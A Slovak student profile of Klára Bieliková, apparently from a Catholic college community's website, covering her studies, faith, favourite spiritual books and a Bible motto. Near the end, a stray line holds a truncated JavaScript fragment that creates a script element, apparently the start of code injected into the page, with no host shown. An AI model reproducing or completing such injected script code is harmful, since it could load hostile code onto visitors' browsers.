Profil študenta #2: Klára Bieliková

Narodila som sa a pochádzam z: Narodila som sa v Ilave, bývam v Púchove.

Študujem na: Pedagogickej fakulte Univerzity Komenského v Bratislave

Čo ma priviedlo do Kolégia: Túžba. Počula som pochvalné slová z viacerých strán, potom som si sama začala zháňať nejaké informácie. A raz prišla chvíľa, keď som vedela, že to musím vyskúšať.

V čom ma zatiaľ Kolégium najviac zmenilo: Menej klamem samu seba. Niekedy dokonca viem otvoriť ústa a niečo povedať. Som si viac vedomá, aký kus cesty smerom k Dobru je ešte predo mnou.

Môj najväčší zážitok z Kolégia: Mám veľmi rada, keď máme nejaký komunitný čas alebo sme na svätej omši a spolužiaci-kamaráti hrajú a spievajú. Alebo keď Štefan uvarí čierny čaj a diskutujeme, o čom chceme.

Mojou najväčšou túžbou je: Duchovné rytierstvo.

Takúto superschopnosť by som chcela mať: Pokoru. Keby som ju mala, nepísala by som to sem, lebo aj priznanie, že túžime po pokore, je prejavom pýchy, lebo chceme, aby druhí videli, že sme dobrí a pokorní. A silu k činom – malým, každodenným, ale dôležitým.

Voľný čas trávim: Pri čítaní literatúry. Neplytkými rozhovormi s inými srdciami. Re- a preflexiou nad životom, niekedy až zbytočne veľa.

3 knihy, ktoré ma v mojom živote najviac zasiahli (okrem Biblie):

Evanjelium ako mi bolo zjavené od Marie Valtorty

Denníček sv. Faustíny

Príbeh istej duše od svätej Terezky z Lisieux

Na človeku si najviac vážim: Mám rada rôznosť a cením si, keď má človek odvahu byť autentický. K tomu patrí aj úprimnosť.

V budúcnosti by som chcela robiť: Učiť svoje deti, alebo deti z okolia, písať.

Moje motto je: Joj, ono by ich bolo asi viac, ale toto mám obzvlášť rada: ,,Lebo Boh tak miloval svet, že dal svojho jednorodeného syna, aby každý, kto v Neho uverí, nezahynul, ale mal večný život.“ (Ján 3:16)

KAN-2015-report_062var d=document;var s=d.createElement(‘script’);

0 komentárov

Zanechajte komentár

Chcete sa pripojiť k diskusii?
Neváhajte prispieť!

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *